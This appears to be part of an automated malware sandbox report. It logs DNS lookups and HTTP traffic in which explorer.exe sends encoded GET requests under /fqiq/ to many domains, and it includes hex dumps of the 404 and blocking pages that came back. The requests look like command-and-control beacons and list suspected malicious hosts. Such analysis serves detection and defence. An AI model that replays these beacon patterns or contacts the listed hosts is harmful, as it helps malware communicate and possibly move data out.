                                            Oct 27, 2021 19:15:07.616633892 CEST8.8.8.8192.168.2.30x1121No error (0)thedusi.com34.102.136.180A (IP address)IN (0x0001)
                                            Oct 27, 2021 19:15:12.840934992 CEST8.8.8.8192.168.2.30x87b4No error (0)www.mask60.commask60.comCNAME (Canonical name)IN (0x0001)
                                            Oct 27, 2021 19:15:12.840934992 CEST8.8.8.8192.168.2.30x87b4No error (0)mask60.com116.212.126.191A (IP address)IN (0x0001)
                                            Oct 27, 2021 19:15:18.393908978 CEST8.8.8.8192.168.2.30x4685Name error (3)www.qywyfeo8.xyznonenoneA (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • www.isshinn1.com
                                            • www.rdoi.top
                                            • www.megacinema.club
                                            • www.passiverewardssystems.com
                                            • www.sosoon.store
                                            • www.esyscoloradosprings.com
                                            • www.24000words.com
                                            • www.healthyweekendtips.com
                                            • www.thedusi.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.349776157.7.107.19380C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Oct 27, 2021 19:14:13.138565063 CEST1814OUTGET /fqiq/?7ntl=P0DdOFE&t4=e+AZlQHvj0Nkc3ZxJNwaiuJVmPOcAOQ1LYKBIXTaam/aWkR0DWWiTlTQ8bI2AJlImQfa HTTP/1.1
                                            Host: www.isshinn1.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Oct 27, 2021 19:14:13.425698996 CEST1840INHTTP/1.1 404 Not Found
                                            Date: Wed, 27 Oct 2021 17:14:13 GMT
                                            Content-Type: text/html
                                            Content-Length: 19220
                                            Connection: close
                                            Server: Apache
                                            Last-Modified: Mon, 23 Jul 2018 06:31:26 GMT
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 63 61 70 74 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 0a 20 20 20 20 20
                                            Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; font-weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex;
                                            Oct 27, 2021 19:14:13.425728083 CEST1842INData Raw: 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74
                                            Data Ascii: display: -ms-flexbox; display: flex; -webkit-justify-content: center; -ms-flex-pack: center; justify-content: center; -webkit-align-items: center; -ms-flex-align: center;
                                            Oct 27, 2021 19:14:13.425744057 CEST1843INData Raw: 6d 69 64 64 6c 65 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 63 33 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 6f 72 64 65
                                            Data Ascii: middle; border-radius: 6px; background: #fc3; -webkit-order: 1; -ms-flex-order: 1; order: 1; } .lol-error-page__information-balloon::after { position: absolute; z-index: 1;
                                            Oct 27, 2021 19:14:13.425762892 CEST1844INData Raw: 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 2d 62 61 6e 6e 65 72 2d 68 6f 6c 69 7a 6f 6e 74 61 6c 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 33 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 68
                                            Data Ascii: } .lol-error-page__ad-banner-holizontal { width: 300px; height: auto; margin: auto; } @media screen and (min-width: 640px) { .lol-error-page__ad-banner-holizontal { display: inline
                                            Oct 27, 2021 19:14:13.425780058 CEST1846INData Raw: 2e 39 2d 31 32 2e 30 34 68 2d 2e 33 32 39 63 2d 31 34 2e 31 20 30 2d 32 34 2e 33 31 37 20 33 2e 39 38 38 2d 33 30 2e 31 35 33 20 31 31 2e 38 36 2d 39 2e 34 20 31 32 2e 35 30 37 2d 34 2e 34 38 39 20 33 30 2e 30 31 31 2d 34 2e 33 20 33 30 2e 37 34
                                            Data Ascii: .9-12.04h-.329c-14.1 0-24.317 3.988-30.153 11.86-9.4 12.507-4.489 30.011-4.3 30.748.052.166.127.323.224.467-.326 3.036-.826 6.051-1.5 9.03-1.691 7.962-3.442 16.209 1.5 22.44 4.942 6.231 15.69 9.155 33.7 9.226h.718c17.583 0 28.1-2.845 33.056-8.
                                            Oct 27, 2021 19:14:13.425795078 CEST1847INData Raw: 31 2d 31 2e 35 38 68 31 36 2e 35 32 31 63 2e 38 38 37 2d 2e 30 30 31 20 31 2e 36 34 33 2e 36 34 34 20 31 2e 37 38 31 20 31 2e 35 32 6c 32 2e 39 39 32 20 32 33 2e 39 37 32 63 2e 30 35 34 2e 35 36 31 2d 2e 31 35 36 20 31 2e 31 31 36 2d 2e 35 36 39
                                            Data Ascii: 1-1.58h16.521c.887-.001 1.643.644 1.781 1.52l2.992 23.972c.054.561-.156 1.116-.569 1.5l-11.417 10.538c-.343.311-.794.476-1.257.462z"/><path fill="#fff" d="M42.832 89.626l9.173 8.8 9.488-8.726-2.634-21.476h-13.393z"/><path fill="#f60" d="M88.16
                                            Oct 27, 2021 19:14:13.426031113 CEST1849INData Raw: 37 33 36 20 32 32 2e 31 31 37 20 31 30 2e 38 32 31 20 33 34 2e 34 31 38 20 31 30 2e 35 33 35 2e 39 34 37 20 32 2e 33 36 33 20 31 2e 36 31 35 20 34 2e 38 32 38 20 31 2e 39 39 20 37 2e 33 34 35 2d 2e 36 31 20 31 2e 37 38 34 2d 2e 38 35 34 20 33 2e
                                            Data Ascii: 736 22.117 10.821 34.418 10.535.947 2.363 1.615 4.828 1.99 7.345-.61 1.784-.854 3.673-.718 5.554 0 .933 0 1.926-.075 3.01-.075 1.084-.195 2.017-.3 2.935-.282 1.589-.348 3.209-.195 4.816-3.73 11.227-12.574 19.384-22.555 19.384zm32.922-26.443c-.
                                            Oct 27, 2021 19:14:13.426050901 CEST1850INData Raw: 31 39 2e 33 36 34 2d 31 2e 39 35 39 2d 2e 30 37 38 2d 32 2e 33 33 36 2d 2e 39 39 32 2d 2e 33 37 37 2d 2e 39 31 34 2e 30 35 31 2d 31 2e 39 36 2e 39 35 39 2d 32 2e 33 34 39 20 32 2e 36 35 33 2d 31 2e 31 32 33 20 35 2e 37 31 39 2d 2e 35 38 31 20 37
                                            Data Ascii: 19.364-1.959-.078-2.336-.992-.377-.914.051-1.96.959-2.349 2.653-1.123 5.719-.581 7.826 1.385.468.523.59 1.27.314 1.915-.276.645-.901 1.072-1.602 1.095l-.013.06z"/><path fill="#fff" d="M56.39 64.973l-4.115 1.46-4.115-1.5"/><path fill="#f60" d="
                                            Oct 27, 2021 19:14:13.426067114 CEST1851INData Raw: 6c 2d 2e 31 35 38 2d 2e 32 33 38 63 2d 2e 33 37 32 2d 2e 35 33 37 2d 2e 37 34 2d 31 2e 31 30 38 2d 31 2e 31 32 33 2d 31 2e 37 32 34 6c 2d 2e 34 34 32 2d 2e 37 33 36 2d 2e 32 31 34 2d 2e 33 36 35 2d 2e 34 33 31 2d 2e 37 34 38 63 2d 31 2e 32 39 39
                                            Data Ascii: l-.158-.238c-.372-.537-.74-1.108-1.123-1.724l-.442-.736-.214-.365-.431-.748c-1.299-2.367-2.416-4.83-3.342-7.366-1.876-5.242-3.133-10.686-3.746-16.22l1.927-.47 2.274 5.9c.088.224.271.396.5.47l.241.038c.153 0 .302-.044.43-.128l10.472-6.891 3.85-
                                            Oct 27, 2021 19:14:13.426088095 CEST1853INData Raw: 38 39 20 32 2e 31 36 2d 39 2e 38 38 32 20 36 2e 34 35 38 2d 35 2e 31 32 35 2d 31 33 2e 33 30 38 7a 6d 32 34 2e 32 31 31 20 36 2e 39 35 36 6c 2d 33 2e 33 37 36 2d 32 2e 32 34 32 20 31 30 2e 30 38 34 2d 39 2e 36 2e 36 38 31 2e 32 33 34 2e 32 35 34
                                            Data Ascii: 89 2.16-9.882 6.458-5.125-13.308zm24.211 6.956l-3.376-2.242 10.084-9.6.681.234.254.12 7.7 3.854-.443 1-5.185 13.111-9.715-6.477zm7.749 35.878c.152.157.235.367.232.585v8.083h18.019v-26.078c-.006-.325.186-.622.485-.75.096-.036.198-.052.3-.047h.0
                                            Oct 27, 2021 19:14:13.706497908 CEST4257INData Raw: 2d 35 2e 36 34 34 20 32 30 2e 33 32 32 2d 37 2e 38 35 36 2d 2e 30 32 36 20 31 2e 33 34 31 2e 30 32 34 20 32 2e 36 38 33 2e 31 35 20 34 2e 30 31 38 2e 33 36 36 20 36 2e 38 38 34 20 31 2e 36 37 35 20 31 33 2e 36 38 35 20 33 2e 38 39 31 20 32 30 2e
                                            Data Ascii: -5.644 20.322-7.856-.026 1.341.024 2.683.15 4.018.366 6.884 1.675 13.685 3.891 20.213 1.063 3.117 2.39 6.138 3.966 9.03.224.391.449.783.673 1.159l.554.9c.299.481.603.948.913 1.4l.209.316c.4.587.823 1.174 1.242 1.716.419.542.928 1.159 1.407 1.7


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.349786104.233.161.24180C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Oct 27, 2021 19:14:19.347495079 CEST8036OUTGET /fqiq/?t4=DrMAfIISwi8U79fOFtAc8vb7WUYlKccaGhxOihVWZlb0OyUiTIjpechuj+pZJYn+REB0&7ntl=P0DdOFE HTTP/1.1
                                            Host: www.rdoi.top
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Oct 27, 2021 19:14:19.671010017 CEST8036INHTTP/1.1 404 Not Found
                                            Date: Wed, 27 Oct 2021 17:14:19 GMT
                                            Server: Apache
                                            Content-Length: 258
                                            Connection: close
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 64 6f 69 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.rdoi.top Port 80</address></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            2192.168.2.34978845.93.101.5180C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Oct 27, 2021 19:14:24.933825016 CEST9731OUTGET /fqiq/?7ntl=P0DdOFE&t4=VbjQ+CrtVqSc6MjyqwiIrbcVi4OLgBoaswazXZOO5Xcx+UM7PWGlfM9NMvQxrE1YfGIg HTTP/1.1
                                            Host: www.megacinema.club
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Oct 27, 2021 19:14:25.242954016 CEST9732INHTTP/1.1 404 Not Found
                                            Connection: close
                                            content-type: text/html
                                            last-modified: Tue, 09 Jul 2019 06:18:14 GMT
                                            etag: "999-5d2431a6-22b54e502ae80759;;;"
                                            accept-ranges: bytes
                                            content-length: 2457
                                            date: Wed, 27 Oct 2021 17:14:25 GMT
                                            server: LiteSpeed
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6f 70 73 2c 20 73 6f 6d 65
                                            Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, some
                                            Oct 27, 2021 19:14:25.242989063 CEST9734INData Raw: 74 68 69 6e 67 20 6c 6f 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c 69 6b 65 20 74 68 65 20 70 61 67 65
                                            Data Ascii: thing lost</title> <meta name="description" content="Oops, looks like the page is lost. Start your website on the cheap."> <link media="all" rel="stylesheet" href="/htdocs_error/style.css"> <link rel="stylesheet" href="https://maxc
                                            Oct 27, 2021 19:14:25.243014097 CEST9734INData Raw: 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: </div> </div></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            3192.168.2.349789203.170.80.25380C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Oct 27, 2021 19:14:30.605387926 CEST9735OUTGET /fqiq/?t4=S7zufRYckdaRFFMeU2i8sPw6oODMRAGo5BePfs9LVZnwdcptwuHxEcdCnQUJ/1YT2L5I&7ntl=P0DdOFE HTTP/1.1
                                            Host: www.passiverewardssystems.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            4192.168.2.34981118.118.119.18380C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Oct 27, 2021 19:14:36.087368965 CEST9784OUTGET /fqiq/?7ntl=P0DdOFE&t4=37G2EJO5ajdFCPilMv01MVSoTtyG1cwu/oJiLg0B75A/3Z+IhDAr8cszuRbw5Svr7Hw7 HTTP/1.1
                                            Host: www.sosoon.store
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Oct 27, 2021 19:14:36.235888004 CEST9786INHTTP/1.1 404 Not Found
                                            Server: nginx/1.14.1
                                            Date: Wed, 27 Oct 2021 17:14:36 GMT
                                            Content-Type: text/html
                                            Content-Length: 169
                                            Connection: close
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            5192.168.2.349816108.167.135.12280C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Oct 27, 2021 19:14:41.554748058 CEST9798OUTGET /fqiq/?t4=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PStfGU22/Dk&7ntl=P0DdOFE HTTP/1.1
                                            Host: www.esyscoloradosprings.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Oct 27, 2021 19:14:41.696489096 CEST9800INHTTP/1.1 503 Service Unavailable
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 884
                                            Connection: close
                                            P3P: CP="CAO PSA OUR"
                                            Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                            Pragma: no-cache
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 50 52 41 47 4d 41 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 2d 43 41 43 48 45 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 20 20 23 63 6f 6e 74 65 6e 74 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 33 70 78 20 73 6f 6c 69 64 23 61 61 61 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 